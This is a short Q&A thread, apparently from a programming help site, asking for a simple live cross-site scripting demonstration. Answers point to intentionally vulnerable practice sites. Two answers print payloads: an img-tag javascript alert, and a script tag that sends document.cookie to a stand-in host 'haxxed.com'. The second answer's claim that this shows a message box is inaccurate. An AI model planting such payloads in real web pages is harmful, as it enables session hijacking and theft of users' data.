Can someone show me a Cross-site scripting attack in effect on my browser? Is there an example on the internet that does this? I haven't found this on the internet.
The simpler the example is the better.
Asked
Active
Viewed 9.7k times
4 Answers
33
See http://www.insecurelabs.org and http://www.insecurelabs.org/task/
Intentionally vulnerable to XSS in the search field and several other places.
Erlend
- 4,336
- 22
- 25
-
2Type in search and it alerts me – RN Kushwaha Mar 13 '15 at 11:59
-
Yes, but the point isn't to reveal all the bugs here. And there are certainly more than that. – Erlend Apr 17 '15 at 06:04
8
<img src="javascript:alert('hello everybody')"></img>
The image tag that I inserted is a example of xss. the above src contains the java script alerting you.
user3176091
- 89
- 1
- 1
7
You'll generally have to install your own server-side software for a live XSS example. Not many legitimate sites will open an XSS flaw intentionally to web surfers.
One ready-made piece of server-side software that lets you demonstrate XSS (among many other things) to yourself is OWASP's WebGoat. Here are instructions to install WebGoat and demonstrate XSS. You will find additional examples of program snippets that enable XSS in the OWASP article "Cross-site scripting (XSS)".
minopret
- 4,726
- 21
- 34
6
Simple Form would also be: If the message box will show up, you know, that the page or the server is vulnerable.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
A great sample of how the technique works can be found here https://www.hacksplaining.com/exercises/xss-stored
RiftOut
- 89
- 2
- 7
-
Found this blog useful https://lurninghut.com/xss-cross-site-scripting-java-demo.html, it has Java example of spinning up servers and victim environment. – gauravbhatt13 Sep 25 '21 at 07:32